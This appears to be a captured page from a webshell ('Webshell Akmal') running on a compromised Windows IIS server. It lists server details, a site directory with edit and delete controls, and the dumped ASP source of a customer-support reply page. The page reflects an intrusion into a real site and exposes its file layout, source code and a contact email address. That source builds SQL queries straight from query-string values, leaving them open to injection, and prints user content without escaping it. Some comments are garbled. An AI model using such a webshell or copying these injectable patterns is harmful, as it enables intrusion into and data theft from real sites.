Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<!--#include file="include/Mailsmtp.asp" --> <table id="main_content" style="width:800px; border:0px;" bgcolor="#f2f2f2" cellpadding="1" cellspacing="0"> <tr> <td><div align="center"><strong>Date Created</strong></div></td> <td><div align="center"><strong>Tracking</strong></div></td> <td style="text-align:center"><strong>Subject</strong></td> <td><div align="center"><strong>Last update </strong></div></td> <td><div align="center"><strong>Status</strong></div></td> </tr> <% questionid = request.QueryString("questionid") trackingNum=request.QueryString("tracking") Thispage ="http://" & Request.ServerVariables("SERVER_NAME")& Request.ServerVariables("URL") UserEmail=session("UserEmail") First_Msg= "" My_subject = "" StartTime = "" Dim EmaiMsg(100,3) '�����ˣ�ʱ�䣬���� id_email = 0 Set Page = new Cls_Page '�������� Set Page.Conn = conn '�õ����ݿ����Ӷ��� With Page .PageSize = 5 'ÿҳ��¼���� .PageParm = "page" 'ҳ���� '.PageIndex = 10 '��ǰҳ����ѡ������һ�������ɾ�̬ʱ��Ҫ .Database = "ac" '���ݿ�����,ACΪaccess,MSSQLΪsqlserver2000�洢���̰�,MYSQLΪmysql,PGSQLΪPostGreSql .Pkey="id" '���� .Field="id,tracking,subject,content,creatdate,lastdate,status,userid,useremail" '�ֶ� .Table="Question" '���� .Condition="id="&questionid&"" '����,����Ҫwhere '.OrderBy="creatdate desc" '����,����Ҫorder by,��Ҫasc����desc .RecordCount = 0 '�ܼ�¼���������ⲿ��ֵ��0�����棨�ʺ���������-1��Ϊsession��-2��Ϊcookies��-3��Ϊapplacation .NumericJump = 5 '��������ҳ��������ѡ������Ĭ��Ϊ3������Ϊ��ת������0Ϊ��ʾ���� .Template = "<div class=""page_list""><div class=""list_info"">{$FirstPage}{$PreviousPage}{$NumericPage}{$NextPage}{$LastPage}</div></div>" '����ģ�壬��ѡ��������Ĭ��ֵ .FirstPage = " << " '��ѡ��������Ĭ��ֵ '.FirstPage = "��ҳ" .PreviousPage = " < " '��ѡ��������Ĭ��ֵ '.PreviousPage = "��һҳ" .NextPage = " > " '��ѡ��������Ĭ��ֵ '.NextPage = "��һҳ" .LastPage = " >> " '��ѡ��������Ĭ��ֵ '.LastPage = "βҳ" .NumericPage = "{$PageNum}" '���ַ�ҳ����ģ�壬��ѡ��������Ĭ��ֵ End With rs = Page.ResultSet() '��¼�� 'rc = Page.RowCount() '��ѡ������ܼ�¼�� nav = Page.Nav() '��ҳ��ʽ %> <% If IsNull(rs) Then %> <tr> <td colspan="5" align="center" class="content_list">No Message</td> </tr> <% Else For i=0 To Ubound(rs,2) First_Msg = rs(3,i) My_subject = rs(2,i) StartTime = rs(4,i) %> <tr> <td> <span style="background-color:#fff; width:100px; height:30px; display:inline-table;"><%=rs(4,i)%></span> </td> <td height="43"> <span style="background-color:#fff; width:100px; height:30px; display:inline-table;"><%=rs(1,i)%></span> </td> <td align="left"> <span style="background-color:#fff; width:170px; height:30px; display:inline-table;"> <a href="myaccount.asp?ID=MyAsc365Reply&questionid=<%=rs(0,i)%>" target="_blank"><%=rs(2,i)%></a> </span> </td> <td> <span style="background-color:#fff; width:100px; height:30px; display:inline-table;"><%=rs(5,i)%></span> </td> <% state1=rs(6,i) if state1=0 then %> <td> <span style="background-color:#fff; width:100px; height:30px; display:inline-table;">Need Reply</span> </td> <% else %> <td> <span style="background-color:#fff; width:100px; height:30px; display:inline-table;">Replied</span> </td> <% end if %> </tr> <% next end if %> </table> <h2 align="left"> <a href="#reply">Reply</a> </h2> <table style="width:800px; table-layout:fixed;" align="left"> <% set rsRep = server.CreateObject("adodb.recordset") sqlRep = "select * from Reply where tracking = '"&trackingNum&"' order by replytime desc" rsRep.open sqlRep,conn,1,1 if rsRep.eof and rsRep.bof then response.Write("No Message Replied") else do while not rsRep.eof if len(rsRep("useremail"))>0 then emailinfo=rsRep("useremail") else emailinfo="Admin" end if if rsRep("usertype")=2 then EmaiMsg(id_email,0)="Admin" else EmaiMsg(id_email,0)=rsRep("useremail") end if EmaiMsg(id_email,1) = rsRep("replytime") EmaiMsg(id_email,2) = replace(rsRep("replycontent"),vbCrLf,"</br>") %> <tr bgcolor="#f2f2f2" style="width:800px; table-layout:fixed;" align="left"> <td style="width:800px; table-layout:fixed;" height="20"><span><%=emailinfo%></span><span style="float:right;"><%=rsRep("replytime")%></span></td> </tr> <tr style="width:800px; table-layout:fixed;" align="left"> <td style="table-layout:fixed; width:800px; clear:both; word-break:break-all; color:#666666"><%=EmaiMsg(id_email,2)%></td> </tr> <% id_email = id_email*1 + 1 rsRep.movenext loop end if rsRep.close set rsRep = nothing %> </table> <% %> <form action="?id=MyAsc365Reply&Action=ReplyQuestion&questionid=<%=questionid%>&tracking=<%=trackingNum%>" method="post"> <table style="width:500px;"> <tr> <td>UserEmail</td><td><input type="text" style="width:500px;" name="useremail" value="<%=session("UserEmail")%>" <%if len(trim(session("UserEmail"))) <> 0 then%> onfocus="this.blur()" <%end if%>/></td> </tr> <tr> <td>replycontent</td><td><textarea rows="5" style="width:500px;" cols="70" name="content"></textarea></td> </tr> <tr> <td colspan="2"><input type="submit" value="Reply"/> </tr> </table> </form> <a name="reply"></a> <% action = request.QueryString("Action") sqlreplyque = "select * from Reply" set rsreplyque = server.CreateObject("adodb.recordset") rsreplyque.open sqlreplyque,conn,1,3 if action = "ReplyQuestion" then if len(trim(Request.Form("useremail"))) = 0 or len(trim(Request.Form("content"))) = 0 or len(trim(Request.Form("content")))*1 > 1000 then if len(trim(Request.Form("useremail"))) = 0 then response.write("<font color='red'>Please input your Email.</font></br>") 'readonly if len(trim(Request.Form("content"))) = 0 then response.write("<font color='red'>Please input your Reply.</font></br>") if len(trim(Request.Form("content")))*1 > 1000 then response.write("<font color='red'>Your reply is too long.</font></br>") else rsreplyque.addnew rsreplyque("userid") = session("UserId") rsreplyque("useremail") = Request.Form("useremail") rsreplyque("tracking") = trackingNum rsreplyque("replycontent") = Request.Form("content") rsreplyque("replytime") = now rsreplyque.update '**************************************************** WW = "<table border='0' width='95%' style='table-layout:fixed;border-collapse: collapse' algin='left'>" WW = WW& "<tr bgcolor='#F2F2F2' align='left' height='20'>" &"<td><span>"& Request.Form("useremail") &"</span><span style='float:right;'>" & now&"</span></td></tr><tr bgcolor='#FFFFFF' align='left' height='20'><td style='table-layout:fixed; clear:both;word-break:break-all;color:#666666'>"& replace(Request.Form("content"),vbCrLf,"</br>") & "</td></tr>" for i = 0 to id_email-1 WW = WW& "<tr height='20'><td></td></tr><tr><td><HR style='FILTER: progid:DXImageTransform.Microsoft.Glow(color=#987cb9,strength=10)' width='100%' color=#987cb9 SIZE=1></td></tr>" & "<tr bgcolor='#F2F2F2' align='left' height='20'>" &"<td><span>"& EmaiMsg(i,0) &"</span><span style='float:right;'>" & EmaiMsg(i,1)&"</span></td></tr><tr bgcolor='#FFFFFF' align='left' height='20'><td style='table-layout:fixed; clear:both;word-break:break-all;color:#666666'>"& EmaiMsg(i,2) & "</td></tr>" next WW = WW& "<tr height='20'><td></td></tr><tr><td><HR style='FILTER: progid:DXImageTransform.Microsoft.Glow(color=#987cb9,strength=10)' width='100%' color=#987cb9 SIZE=1></td></tr>" & "<tr bgcolor='#F2F2F2' align='left' height='20'>" &"<td><span>"& useremail &"</span><span style='float:right;'>" & StartTime &"</span></td></tr><tr bgcolor='#FFFFFF' align='left' height='20'><td style='table-layout:fixed; clear:both;word-break:break-all;color:#666666'>"& replace(First_Msg,vbCrLf,"</br>") & "</td></tr>" WW = WW & "</table>" ' set newmail=server.CreateObject("cdonts.newmail") ' newmail.From=Request.Form("useremail") '����������ʽ���ͣ��˷�������ͨ������˱��������֤ ' newmail.value("Reply-To")=Request.Form("useremail") 'Ĭ�ϻظ���ַ���������ύ�ĵ�ַ�������ⱻ�ظ���"webmaster@www.yourdomain.com" ' newmail.To ="asc3652014@hotmail.com" '��ҵ�ʾ��ռ��˵�ַ �dz� asc365web ' newmail.Subject=Request.Querystring("tracking")&"_"&My_subject&"" ' newmail.Body = WW ' newmail.BodyFormat =0 ' newmail.MailFormat =0 ' newmail.Send ' set newmail=nothing MailFrom = Request.Form("useremail") MailTo = "asc3652014@hotmail.com" MailSubject = Request.Querystring("tracking")&"_"&My_subject&"" mailtext = "<html><body>" & WW & "</body></html>" MySendEmail MailFrom,MailTo,MailSubject,mailtext '**************************************************** response.Write("<script type=""text/javascript"">alert('Reply Success');top.location.href='myaccount.asp?id=MyAsc365Reply&questionid="&questionid&"&tracking="&trackingNum&"';</script>") end if end if rsreplyque.close set rsreplyque = nothing %>